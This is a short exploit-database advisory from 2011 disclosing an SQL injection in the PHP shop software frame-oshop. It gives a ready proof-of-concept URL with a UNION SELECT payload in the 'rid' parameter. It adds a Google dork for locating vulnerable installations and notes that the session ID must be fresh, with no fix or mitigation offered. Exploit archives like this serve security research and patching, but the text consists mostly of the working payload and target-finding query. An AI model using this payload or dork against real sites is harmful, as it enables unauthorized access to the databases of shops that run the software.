frame-oshop - SQL Injection

EDB-ID:

17289

CVE:

N/A


Author:

-SmoG-

Type:

webapps


Platform:

PHP

Date:

2011-05-15


product:	frame-oshop
vendor:		http://www.sdaxx.de/
date:		15.05.2011
status:		0day
version:	i dunno...

PoC: http://www.host.com/shop/main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12

Dork: 		"2006 by Sdaxx Rostock" intitle:"frame-oshop"

Note:		-sessid had to be fresh
		-there are more vuln...

>>published by -SmoG- on SceneGround.info<<


gretz to my mentor Therion, c0x and other sg-members!